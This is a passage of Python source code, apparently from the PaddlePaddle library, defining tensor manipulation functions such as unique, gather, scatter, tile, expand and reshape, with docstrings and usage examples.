np_output = output.numpy() # [2 1 3 0 1 2 1 3 2 1 3]
x = paddle.to_tensor([[2, 1, 3], [3, 0, 1], [2, 1, 3], [2, 1, 3]])
output = paddle.unique_consecutive(x, axis=0) #
np_output = output.numpy()
# [[2 1 3]
# [3 0 1]
# [2 1 3]]
"""
if axis is None:
axis = []
else:
axis = [axis]
attr_dtype = convert_np_dtype_to_dtype_(dtype)
if in_dygraph_mode():
out, inverse, counts = _C_ops.unique_consecutive(
x, 'dtype', attr_dtype, 'return_inverse', return_inverse,
'return_counts', return_counts, 'axis', axis)
outs = [out]
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
if len(outs) == 1:
return outs[0]
return tuple(outs)
check_variable_and_dtype(x, "input",
['float32', 'float64', 'int32', 'int64'],
'unique_consecutive')
check_type(return_inverse, 'return_inverse', bool, 'unique_consecutive')
check_type(return_counts, 'return_counts', bool, 'unique_consecutive')
check_dtype(dtype, 'dtype', ['int32', 'int64'], 'unique_consecutive')
if len(axis) != 0:
check_type(axis[0], 'axis', int, 'unique_consecutive')
helper = LayerHelper('unique_consecutive', **locals())
attrs = {
'dtype': attr_dtype,
"return_inverse": return_inverse,
"return_counts": return_counts,
"axis": axis,
}
out = helper.create_variable_for_type_inference(
dtype=x.dtype, stop_gradient=True)
inverse = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
counts = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
outputs = {"Out": out, "Index": inverse, "Counts": counts}
outs = [out]
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
helper.append_op(
type="unique_consecutive",
inputs={"X": x},
attrs=attrs,
outputs=outputs)
if len(outs) == 1:
return outs[0]
return tuple(outs)
def unique(x,
return_index=False,
return_inverse=False,
return_counts=False,
axis=None,
dtype="int64",
name=None):
r"""
Returns the unique elements of `x` in ascending order.
Args:
x(Tensor): The input tensor, it's data type should be float32, float64, int32, int64.
return_index(bool, optional): If True, also return the indices of the input tensor that
result in the unique Tensor.
return_inverse(bool, optional): If True, also return the indices for where elements in
the original input ended up in the returned unique tensor.
return_counts(bool, optional): If True, also return the counts for each unique element.
axis(int, optional): The axis to apply unique. If None, the input will be flattened.
Default: None.
dtype(np.dtype|str, optional): The date type of `indices` or `inverse` tensor: int32 or int64.
Default: int64.
name(str, optional): Name for the operation. For more information, please refer to
:ref:`api_guide_Name`. Default: None.
Returns:
tuple: (out, indices, inverse, counts). `out` is the unique tensor for `x`. `indices` is \
provided only if `return_index` is True. `inverse` is provided only if `return_inverse` \
is True. `counts` is provided only if `return_counts` is True.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([2, 3, 3, 1, 5, 3])
unique = paddle.unique(x)
np_unique = unique.numpy() # [1 2 3 5]
_, indices, inverse, counts = paddle.unique(x, return_index=True, return_inverse=True, return_counts=True)
np_indices = indices.numpy() # [3 0 1 4]
np_inverse = inverse.numpy() # [1 2 2 0 3 2]
np_counts = counts.numpy() # [1 1 3 1]
x = paddle.to_tensor([[2, 1, 3], [3, 0, 1], [2, 1, 3]])
unique = paddle.unique(x)
np_unique = unique.numpy() # [0 1 2 3]
unique = paddle.unique(x, axis=0)
np_unique = unique.numpy()
# [[2 1 3]
# [3 0 1]]
"""
if axis is None:
axis = []
else:
axis = [axis]
attr_dtype = convert_np_dtype_to_dtype_(dtype)
if in_dygraph_mode():
out, inverse, indices, counts = _C_ops.unique(
x, 'dtype', attr_dtype, 'return_index', return_index,
'return_inverse', return_inverse, 'return_counts', return_counts,
'axis', axis, "is_sorted", True)
outs = [out]
if return_index:
outs.append(indices)
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
if len(outs) == 1:
return outs[0]
return tuple(outs)
check_variable_and_dtype(x, "input",
['float32', 'float64', 'int32', 'int64'], 'unique')
check_type(return_index, 'return_index', bool, 'unique')
check_type(return_inverse, 'return_inverse', bool, 'unique')
check_type(return_counts, 'return_counts', bool, 'unique')
check_dtype(dtype, 'dtype', ['int32', 'int64'], 'unique')
if len(axis) != 0:
check_type(axis[0], 'axis', int, 'unique')
helper = LayerHelper('unique', **locals())
attrs = {
'dtype': attr_dtype,
"return_index": return_index,
"return_inverse": return_inverse,
"return_counts": return_counts,
"axis": axis,
"is_sorted": True
}
out = helper.create_variable_for_type_inference(
dtype=x.dtype, stop_gradient=True)
indices = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
inverse = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
counts = helper.create_variable_for_type_inference(
dtype=attr_dtype, stop_gradient=True)
outputs = {
"Out": out,
"Indices": indices,
"Index": inverse,
"Counts": counts
}
outs = [out]
if return_index:
outs.append(indices)
if return_inverse:
outs.append(inverse)
if return_counts:
outs.append(counts)
helper.append_op(
type="unique", inputs={"X": x}, attrs=attrs, outputs=outputs)
if len(outs) == 1:
return outs[0]
return tuple(outs)
def unsqueeze(x, axis, name=None):
"""
Insert single-dimensional entries to the shape of input Tensor ``x``. Takes one
required argument axis, a dimension or list of dimensions that will be inserted.
Dimension indices in axis are as seen in the output tensor.
Note that the output Tensor will share data with origin Tensor and doesn't have a
Tensor copy in ``dygraph`` mode. If you want to use the Tensor copy version,
please use `Tensor.clone` like ``unsqueeze_clone_x = x.unsqueeze(-1).clone()``.
Args:
x (Tensor): The input Tensor to be unsqueezed. Supported data type: float32, float64, bool, int8, int32, int64.
axis (int|list|tuple|Tensor): Indicates the dimensions to be inserted. The data type is ``int32`` .
If ``axis`` is a list or tuple, the elements of it should be integers or Tensors with shape [1].
If ``axis`` is a Tensor, it should be an 1-D Tensor .
If ``axis`` is negative, ``axis = axis + ndim(x) + 1``.
name (str|None): Name for this layer. Please refer to :ref:`api_guide_Name`, Default None.
Returns:
Tensor: Unsqueezed Tensor with the same data type as input Tensor.
Examples:
.. code-block:: python
import paddle
x = paddle.rand([5, 10])
print(x.shape) # [5, 10]
out1 = paddle.unsqueeze(x, axis=0)
print(out1.shape) # [1, 5, 10]
out2 = paddle.unsqueeze(x, axis=[0, 2])
print(out2.shape) # [1, 5, 1, 10]
axis = paddle.to_tensor([0, 1, 2])
out3 = paddle.unsqueeze(x, axis=axis)
print(out3.shape) # [1, 1, 1, 5, 10]
# out1, out2, out3 share data with x in dygraph mode
x[0, 0] = 10.
print(out1[0, 0, 0]) # [10.]
print(out2[0, 0, 0, 0]) # [10.]
print(out3[0, 0, 0, 0, 0]) # [10.]
"""
return layers.unsqueeze(x, axis, name)
@inplace_apis_in_dygraph_only
def unsqueeze_(x, axis, name=None):
"""
Inplace version of ``unsqueeze`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_paddle_tensor_unsqueeze`.
"""
if isinstance(axis, int):
axis = [axis]
elif isinstance(axis, Variable):
axis = axis.numpy().tolist()
elif isinstance(axis, (list, tuple)):
axis = [
item.numpy().item(0) if isinstance(item, Variable) else item
for item in axis
]
out, _ = _C_ops.unsqueeze2_(x, 'axes', axis)
return out
def gather(x, index, axis=None, name=None):
"""
Output is obtained by gathering entries of ``axis``
of ``x`` indexed by ``index`` and concatenate them together.
.. code-block:: text
Given:
x = [[1, 2],
[3, 4],
[5, 6]]
index = [1, 2]
axis=[0]
Then:
out = [[3, 4],
[5, 6]]
Args:
x (Tensor): The source input tensor with rank>=1. Supported data type is
int32, int64, float32, float64 and uint8 (only for CPU),
float16 (only for GPU).
index (Tensor): The index input tensor with rank=1. Data type is int32 or int64.
axis (Tensor|int, optional): The axis of input to be gathered, it's can be int or a Tensor with data type is int32 or int64. The default value is None, if None, the ``axis`` is 0.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
output (Tensor): The output is a tensor with the same rank as ``x``.
Examples:
.. code-block:: python
import paddle
input = paddle.to_tensor([[1,2],[3,4],[5,6]])
index = paddle.to_tensor([0,1])
output = paddle.gather(input, index, axis=0)
# expected output: [[1,2],[3,4]]
"""
if axis is None:
axis = 0
if in_dygraph_mode():
axis = axis.item() if isinstance(axis, paddle.Tensor) else axis
return _C_ops.gather(x, index, None, "axis", axis, "overwrite", False)
check_variable_and_dtype(
x, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'uint8'],
'gather')
check_variable_and_dtype(index, 'index', ['int32', 'int64'], 'gather')
if isinstance(axis, Variable):
check_variable_and_dtype(axis, 'axis', ['int32', 'int64'], 'gather')
helper = LayerHelper('gather', **locals())
dtype = helper.input_dtype('x')
out = helper.create_variable_for_type_inference(dtype)
if not isinstance(axis, Variable):
helper.append_op(
type="gather",
inputs={"X": x,
"Index": index},
attrs={'axis': axis,
'overwrite': False},
outputs={"Out": out})
else:
helper.append_op(
type="gather",
inputs={"X": x,
"Index": index,
"Axis": axis},
attrs={"overwrite": False},
outputs={"Out": out})
return out
def unbind(input, axis=0):
"""
Removes a tensor dimension, then split the input tensor into multiple sub-Tensors.
Args:
input (Tensor): The input variable which is an N-D Tensor, data type being float32, float64, int32 or int64.
axis (int32|int64, optional): A scalar with type ``int32|int64`` shape [1]. The dimension along which to unbind.
If :math:`axis < 0`, the dimension to unbind along is :math:`rank(input) + axis`. Default is 0.
Returns:
list(Tensor): The list of segmented Tensor variables.
Example:
.. code-block:: python
import paddle
import numpy as np
# input is a variable which shape is [3, 4, 5]
np_input = np.random.rand(3, 4, 5).astype('float32')
input = paddle.to_tensor(np_input)
[x0, x1, x2] = paddle.unbind(input, axis=0)
# x0.shape [4, 5]
# x1.shape [4, 5]
# x2.shape [4, 5]
[x0, x1, x2, x3] = paddle.unbind(input, axis=1)
# x0.shape [3, 5]
# x1.shape [3, 5]
# x2.shape [3, 5]
# x3.shape [3, 5]
"""
if not isinstance(axis, (int)):
raise TypeError("The type of 'axis' must be int, but received %s." %
(type(axis)))
if isinstance(axis, np.generic):
axis = np.asscalar(axis)
input_shape = input.shape
axis_ = axis if axis >= 0 else len(input_shape) + axis
num = input_shape[axis_]
if in_dygraph_mode():
return _C_ops.unbind(input, num, 'axis', axis)
helper = LayerHelper("unbind", **locals())
check_type(input, 'input', (Variable), 'unbind')
dtype = helper.input_dtype()
check_dtype(dtype, 'unbind', ['float32', 'float64', 'int32', 'int64'],
'unbind')
outs = [
helper.create_variable_for_type_inference(dtype=helper.input_dtype())
for i in range(num)
]
helper.append_op(
type="unbind",
inputs={"X": input},
outputs={"Out": outs},
attrs={"axis": axis})
return outs
def scatter(x, index, updates, overwrite=True, name=None):
"""
**Scatter Layer**
Output is obtained by updating the input on selected indices based on updates.
.. code-block:: python
import numpy as np
#input:
x = np.array([[1, 1], [2, 2], [3, 3]])
index = np.array([2, 1, 0, 1])
# shape of updates should be the same as x
# shape of updates with dim > 1 should be the same as input
updates = np.array([[1, 1], [2, 2], [3, 3], [4, 4]])
overwrite = False
# calculation:
if not overwrite:
for i in range(len(index)):
x[index[i]] = np.zeros((2))
for i in range(len(index)):
if (overwrite):
x[index[i]] = updates[i]
else:
x[index[i]] += updates[i]
# output:
out = np.array([[3, 3], [6, 6], [1, 1]])
out.shape # [3, 2]
**NOTICE**: The order in which updates are applied is nondeterministic,
so the output will be nondeterministic if index contains duplicates.
Args:
x (Tensor): The input N-D Tensor with ndim>=1. Data type can be float32, float64.
index (Tensor): The index 1-D Tensor. Data type can be int32, int64. The length of index cannot exceed updates's length, and the value in index cannot exceed input's length.
updates (Tensor): update input with updates parameter based on index. shape should be the same as input, and dim value with dim > 1 should be the same as input.
overwrite (bool): The mode that updating the output when there are same indices.
If True, use the overwrite mode to update the output of the same index,
if False, use the accumulate mode to update the output of the same index.Default value is True.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: The output is a Tensor with the same shape as x.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1, 1], [2, 2], [3, 3]], dtype='float32')
index = paddle.to_tensor([2, 1, 0, 1], dtype='int64')
updates = paddle.to_tensor([[1, 1], [2, 2], [3, 3], [4, 4]], dtype='float32')
output1 = paddle.scatter(x, index, updates, overwrite=False)
# [[3., 3.],
# [6., 6.],
# [1., 1.]]
output2 = paddle.scatter(x, index, updates, overwrite=True)
# CPU device:
# [[3., 3.],
# [4., 4.],
# [1., 1.]]
# GPU device maybe have two results because of the repeated numbers in index
# result 1:
# [[3., 3.],
# [4., 4.],
# [1., 1.]]
# result 2:
# [[3., 3.],
# [2., 2.],
# [1., 1.]]
"""
if in_dygraph_mode():
return _C_ops.scatter(x, index, updates, 'overwrite', overwrite)
check_variable_and_dtype(
x, 'dtype', ['float32', 'float64', 'float16', 'int32', 'int64'],
'scatter')
check_type(overwrite, 'overwrite', bool, 'scatter')
helper = LayerHelper('scatter', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type="scatter",
inputs={"X": x,
"Ids": index,
"Updates": updates},
attrs={'overwrite': overwrite},
outputs={"Out": out})
return out
@inplace_apis_in_dygraph_only
def scatter_(x, index, updates, overwrite=True, name=None):
"""
Inplace version of ``scatter`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_paddle_tensor_scatter`.
"""
return _C_ops.scatter_(x, index, updates, 'overwrite', overwrite)
def scatter_nd_add(x, index, updates, name=None):
r"""
**Scatter_nd_add Layer**
Output is obtained by applying sparse addition to a single value
or slice in a Tensor.
:attr:`x` is a Tensor with ndim :math:`R`
and :attr:`index` is a Tensor with ndim :math:`K` . Thus, :attr:`index`
has shape :math:`[i_0, i_1, ..., i_{K-2}, Q]` where :math:`Q \leq R` . :attr:`updates`
is a Tensor with ndim :math:`K - 1 + R - Q` and its
shape is :math:`index.shape[:-1] + x.shape[index.shape[-1]:]` .
According to the :math:`[i_0, i_1, ..., i_{K-2}]` of :attr:`index` ,
add the corresponding :attr:`updates` slice to the :attr:`x` slice
which is obtained by the last one dimension of :attr:`index` .
.. code-block:: text
Given:
* Case 1:
x = [0, 1, 2, 3, 4, 5]
index = [[1], [2], [3], [1]]
updates = [9, 10, 11, 12]
we get:
output = [0, 22, 12, 14, 4, 5]
* Case 2:
x = [[65, 17], [-14, -25]]
index = [[], []]
updates = [[[-1, -2], [1, 2]],
[[3, 4], [-3, -4]]]
x.shape = (2, 2)
index.shape = (2, 0)
updates.shape = (2, 2, 2)
we get:
output = [[67, 19], [-16, -27]]
Args:
x (Tensor): The x input. Its dtype should be int32, int64, float32, float64.
index (Tensor): The index input with ndim > 1 and index.shape[-1] <= x.ndim.
Its dtype should be int32 or int64 as it is used as indexes.
updates (Tensor): The updated value of scatter_nd_add op, and it must have the same dtype
as x. It must have the shape index.shape[:-1] + x.shape[index.shape[-1]:].
name (str|None): The output tensor name. If set None, the layer will be named automatically.
Returns:
output (Tensor): The output is a tensor with the same shape and dtype as x.
Examples:
.. code-block:: python
import paddle
import numpy as np
x = paddle.rand(shape=[3, 5, 9, 10], dtype='float32')
updates = paddle.rand(shape=[3, 9, 10], dtype='float32')
index_data = np.array([[1, 1],
[0, 1],
[1, 3]]).astype(np.int64)
index = paddle.to_tensor(index_data)
output = paddle.scatter_nd_add(x, index, updates)
"""
return layers.scatter_nd_add(x, index, updates, name=None)
def chunk(x, chunks, axis=0, name=None):
"""
Split the input tensor into multiple sub-Tensors.
Args:
x (Tensor): A N-D Tensor. The data type is bool, float16, float32, float64, int32 or int64.
chunks(int): The number of tensor to be split along the certain axis.
axis (int|Tensor, optional): The axis along which to split, it can be a scalar with type
``int`` or a ``Tensor`` with shape [1] and data type ``int32`` or ``int64``.
If :math::`axis < 0`, the axis to split along is :math:`rank(x) + axis`. Default is 0.
name (str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
list(Tensor): The list of segmented Tensors.
Example:
.. code-block:: python
import numpy as np
import paddle
# x is a Tensor which shape is [3, 9, 5]
x_np = np.random.random([3, 9, 5]).astype("int32")
x = paddle.to_tensor(x_np)
out0, out1, out2 = paddle.chunk(x, chunks=3, axis=1)
# out0.shape [3, 3, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 3, 5]
# axis is negative, the real axis is (rank(x) + axis) which real
# value is 1.
out0, out1, out2 = paddle.chunk(x, chunks=3, axis=-2)
# out0.shape [3, 3, 5]
# out1.shape [3, 3, 5]
# out2.shape [3, 3, 5]
"""
check_type(chunks, 'chunks', (int), 'chunk')
return paddle.fluid.layers.split(
input=x, num_or_sections=chunks, dim=axis, name=name)
def tile(x, repeat_times, name=None):
"""
Construct a new Tensor by repeating ``x`` the number of times given by ``repeat_times``.
After tiling, the value of the i'th dimension of the output is equal to ``x.shape[i]*repeat_times[i]``.
Both the number of dimensions of ``x`` and the number of elements in ``repeat_times`` should be less than or equal to 6.
Args:
x (Tensor): The input tensor, its data type should be bool, float32, float64, int32 or int64.
repeat_times (Tensor|tuple|list): The number of repeating times. If repeat_times is a list or tuple, all its elements
should be integers or 1-D Tensors with the data type int32. If repeat_times is a Tensor, it should be an 1-D Tensor with the data type int32.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([1, 2, 3], dtype='int32')
out = paddle.tile(data, repeat_times=[2, 1])
np_out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
out = paddle.tile(data, repeat_times=[2, 2])
np_out = out.numpy()
# [[1, 2, 3, 1, 2, 3], [1, 2, 3, 1, 2, 3]]
repeat_times = paddle.to_tensor([2, 1], dtype='int32')
out = paddle.tile(data, repeat_times=repeat_times)
np_out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return _C_ops.tile(x, 'repeat_times', repeat_times)
check_type(repeat_times, 'repeat_times', (list, tuple, Variable), 'tile')
if isinstance(repeat_times, Variable):
assert len(repeat_times.shape) == 1, (
'repeat_times must be an 1-D Tensor.')
else:
for elem in repeat_times:
if isinstance(elem, Variable):
assert len(elem.shape) == 1, (
'Elements in repeat_times must be 1-D Tensors or integers.')
else:
type_tuple = (int, np.int32, np.int64)
assert isinstance(elem, type_tuple), (
'Elements in repeat_times must be 1-D Tensors or integers.')
check_variable_and_dtype(
x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'tile')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
raise ValueError(
"When the date type is bool for the input 'x' of tile op, you "
"must set its stop_gradient to be True by "
"some_var.stop_gradient == True supporting some_var is the input.")
helper = LayerHelper('tile', **locals())
inputs = {"X": [x]}
attrs = {}
def get_attr_repeat_times(list_repeat_times):
attrs_repeat_times = []
for idx, times in enumerate(list_repeat_times):
if isinstance(times, Variable):
attrs_repeat_times.append(-1)
else:
attrs_repeat_times.append(times)
assert times > 0, (
"All elements in repeat_times must be positive for tile.")
return attrs_repeat_times
if isinstance(repeat_times, Variable):
repeat_times.stop_gradient = True
inputs['RepeatTimes'] = repeat_times
attrs['repeat_times'] = [-1]
elif isinstance(repeat_times, (list, tuple)):
attrs['repeat_times'] = get_attr_repeat_times(repeat_times)
if utils._contain_var(repeat_times):
inputs['repeat_times_tensor'] = utils._convert_to_tensor_list(
repeat_times)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='tile', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def expand_as(x, y, name=None):
"""
Expand the input tensor ``x`` to the same shape as the input tensor ``y``.
Both the number of dimensions of ``x`` and ``y`` must be less than or equal to 6, and the number of dimensions of ``y`` must be greather than or equal to that of ``x``. The dimension to expand must have a value of 1.
Args:
x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
y (Tensor): The input tensor that gives the shape to expand to.
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`.
Returns:
N-D Tensor: A Tensor with the same shape as ``y``. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
data_x = paddle.to_tensor([1, 2, 3], 'int32')
data_y = paddle.to_tensor([[1, 2, 3], [4, 5, 6]], 'int32')
out = paddle.expand_as(data_x, data_y)
np_out = out.numpy()
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return _C_ops.expand_as_v2(x, 'target_shape', y.shape)
check_variable_and_dtype(
x, 'x', ['bool', 'float32', 'float64', 'int32', 'int64'], 'expand_as')
check_type(y, 'y', Variable, 'expand_as')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
raise ValueError(
"When the data type of input 'x' for expand_as is bool, "
"you must set its stop_gradient to be False by "
"some_var.stop_gradient = True, supporting "
"some_var as the input 'x'.")
inputs = {"X": [x], "Y": [y]}
helper = LayerHelper('expand_as', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='expand_as_v2',
inputs=inputs,
attrs={'target_shape': y.shape},
outputs={'Out': out})
return out
def broadcast_to(x, shape, name=None):
"""
Broadcast the input tensor to a given shape.
Both the number of dimensions of ``x`` and the number of elements in ``shape`` should be less than or equal to 6. The dimension to broadcast to must have a value 1.
Args:
x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
shape (list|tuple|Tensor): The result shape after broadcasting. The data type is int32. If shape is a list or tuple, all its elements
should be integers or 1-D Tensors with the data type int32. If shape is a Tensor, it should be an 1-D Tensor with the data type int32.
The value -1 in shape means keeping the corresponding dimension unchanged.
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
N-D Tensor: A Tensor with the given shape. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([1, 2, 3], dtype='int32')
out = paddle.broadcast_to(data, shape=[2, 3])
print(out)
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return _C_ops.expand_v2(x, 'shape', shape)
if isinstance(shape, Variable):
assert len(shape.shape) == 1, ('shape must be an 1-D Tensor.')
else:
for elem in shape:
if isinstance(elem, Variable):
assert len(elem.shape) == 1, (
'Elements in shape must be 1-D Tensors or integers.')
else:
type_tuple = (int, np.int32, np.int64)
assert isinstance(elem, type_tuple), (
'Elements in shape must be 1-D Tensors or integers.')
check_variable_and_dtype(x, 'x',
['bool', 'float32', 'float64', 'int32', 'int64'],
'broadcast_to')
check_type(shape, 'shape', (list, tuple, Variable), 'broadcast_to')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
raise ValueError(
"When the data type of input 'x' for broadcast_to is bool, "
"you must set its stop_gradient to be False by "
"some_var.stop_gradient = True, supporting "
"some_var as the input.")
inputs = {"X": [x]}
attrs = {}
helper = LayerHelper('expand', **locals())
def get_attr_expand_shape(list_expand_shape):
attrs_expand_shape = []
for idx, shape in enumerate(list_expand_shape):
if isinstance(shape, Variable):
attrs_expand_shape.append(-1)
else:
attrs_expand_shape.append(shape)
assert shape > 0 or shape == -1, (
"All elements in shape of broadcast_to must be positive or -1."
)
return attrs_expand_shape
if isinstance(shape, Variable):
shape.stop_gradient = True
inputs['Shape'] = shape
elif isinstance(shape, (list, tuple)):
attrs['shape'] = get_attr_expand_shape(shape)
if utils._contain_var(shape):
inputs['expand_shapes_tensor'] = utils._convert_to_tensor_list(
shape)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='expand_v2', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def expand(x, shape, name=None):
"""
Expand the input tensor to a given shape.
Both the number of dimensions of ``x`` and the number of elements in ``shape`` should be less than or equal to 6. The dimension to expand must have a value 1.
Args:
x (Tensor): The input tensor, its data type is bool, float32, float64, int32 or int64.
shape (list|tuple|Tensor): The result shape after expanding. The data type is int32. If shape is a list or tuple, all its elements
should be integers or 1-D Tensors with the data type int32. If shape is a Tensor, it should be an 1-D Tensor with the data type int32.
The value -1 in shape means keeping the corresponding dimension unchanged.
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
N-D Tensor: A Tensor with the given shape. The data type is the same as ``x``.
Examples:
.. code-block:: python
import paddle
data = paddle.to_tensor([1, 2, 3], dtype='int32')
out = paddle.expand(data, shape=[2, 3])
print(out)
# [[1, 2, 3], [1, 2, 3]]
"""
if in_dygraph_mode():
return _C_ops.expand_v2(x, 'shape', shape)
if isinstance(shape, Variable):
assert len(shape.shape) == 1, ('shape must be an 1-D Tensor.')
else:
for elem in shape:
if isinstance(elem, Variable):
assert len(elem.shape) == 1, (
'Elements in shape must be 1-D Tensors or integers.')
else:
type_tuple = (int, np.int32, np.int64)
assert isinstance(elem, type_tuple), (
'Elements in shape must be 1-D Tensors or integers.')
check_variable_and_dtype(
x, 'x', ['bool', 'float16', 'float32', 'float64', 'int32', 'int64'],
'expand')
check_type(shape, 'shape', (list, tuple, Variable), 'expand')
if convert_dtype(x.dtype) == 'bool' and x.stop_gradient == False:
raise ValueError("When the data type of input 'x' for expand is bool, "
"you must set its stop_gradient to be False by "
"some_var.stop_gradient = True, supporting "
"some_var as the input.")
inputs = {"X": [x]}
attrs = {}
helper = LayerHelper('expand', **locals())
def get_attr_expand_shape(list_expand_shape):
attrs_expand_shape = []
for idx, shape in enumerate(list_expand_shape):
if isinstance(shape, Variable):
attrs_expand_shape.append(-2)
else:
attrs_expand_shape.append(shape)
assert shape > 0 or shape == -1, (
"All elements in shape of expand must be positive or -1.")
return attrs_expand_shape
if isinstance(shape, Variable):
shape.stop_gradient = True
inputs['Shape'] = shape
elif isinstance(shape, (list, tuple)):
attrs['shape'] = get_attr_expand_shape(shape)
if utils._contain_var(shape):
inputs['expand_shapes_tensor'] = utils._convert_to_tensor_list(
shape)
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='expand_v2', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def reshape(x, shape, name=None):
"""
This operator changes the shape of ``x`` without changing its data.
Note that the output Tensor will share data with origin Tensor and doesn't
have a Tensor copy in ``dygraph`` mode.
If you want to use the Tensor copy version, please use `Tensor.clone` like
``reshape_clone_x = x.reshape([-1]).clone()``.
Some tricks exist when specifying the target shape.
1. -1 means the value of this dimension is inferred from the total element
number of x and remaining dimensions. Thus one and only one dimension can
be set -1.
2. 0 means the actual dimension value is going to be copied from the
corresponding dimension of x. The index of 0s in shape can not exceed
the dimension of x.
Here are some examples to explain it.
1. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [6, 8], the reshape operator will transform x into a 2-D tensor with
shape [6, 8] and leaving x's data unchanged.
2. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
specified is [2, 3, -1, 2], the reshape operator will transform x into a
4-D tensor with shape [2, 3, 4, 2] and leaving x's data unchanged. In this
case, one dimension of the target shape is set to -1, the value of this
dimension is inferred from the total element number of x and remaining
dimensions.
3. Given a 3-D tensor x with a shape [2, 4, 6], and the target shape
is [-1, 0, 3, 2], the reshape operator will transform x into a 4-D tensor
with shape [2, 4, 3, 2] and leaving x's data unchanged. In this case,
besides -1, 0 means the actual dimension value is going to be copied from
the corresponding dimension of x.
Args:
x(Tensor): An N-D Tensor. The data type is ``float32``, ``float64``, ``int32``, ``int64`` or ``bool``
shape(list|tuple|Tensor): Define the target shape. At most one dimension of the target shape can be -1.
The data type is ``int32`` . If ``shape`` is a list or tuple, the elements of it should be integers or Tensors with shape [1].
If ``shape`` is an Tensor, it should be an 1-D Tensor .
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: A reshaped Tensor with the same data type as ``x``.
Examples:
.. code-block:: python
import numpy as np
import paddle
x = paddle.rand([2, 4, 6], dtype="float32")
positive_four = paddle.full([1], 4, "int32")
out = paddle.reshape(x, [-1, 0, 3, 2])
print(out)
# the shape is [2,4,3,2].
out = paddle.reshape(x, shape=[positive_four, 12])
print(out)
# the shape of out_2 is [4, 12].
shape_tensor = paddle.to_tensor(np.array([8, 6]).astype("int32"))
out = paddle.reshape(x, shape=shape_tensor)
print(out)
# the shape is [8, 6].
# out shares data with x in dygraph mode
x[0, 0, 0] = 10.
print(out[0, 0])
# the value is [10.]
"""
return paddle.fluid.layers.reshape(x=x, shape=shape, name=name)
@inplace_apis_in_dygraph_only
def reshape_(x, shape, name=None):
"""
Inplace version of ``reshape`` API, the output Tensor will be inplaced with input ``x``.
Please refer to :ref:`api_paddle_tensor_reshape`.
"""
if isinstance(shape, (list, tuple)):
shape = [
item.numpy().item(0) if isinstance(item, Variable) else item
for item in shape
]
out, _ = _C_ops.reshape2_(x, None, 'shape', shape)
return out
elif isinstance(shape, Variable):
shape.stop_gradient = True
out, _ = _C_ops.reshape2_(x, shape)
return out
def gather_nd(x, index, name=None):
"""
This function is actually a high-dimensional extension of :code:`gather`
and supports for simultaneous indexing by multiple axes. :attr:`index` is a
K-dimensional integer tensor, which is regarded as a (K-1)-dimensional
tensor of :attr:`index` into :attr:`input`, where each element defines
a slice of params:
.. math::
output[(i_0, ..., i_{K-2})] = input[index[(i_0, ..., i_{K-2})]]
Obviously, :code:`index.shape[-1] <= input.rank` . And, the output tensor has
shape :code:`index.shape[:-1] + input.shape[index.shape[-1]:]` .
.. code-block:: text
Given:
x = [[[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11]],
[[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]]
x.shape = (2, 3, 4)
* Case 1:
index = [[1]]
gather_nd(x, index)
= [x[1, :, :]]
= [[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]
* Case 2:
index = [[0,2]]
gather_nd(x, index)
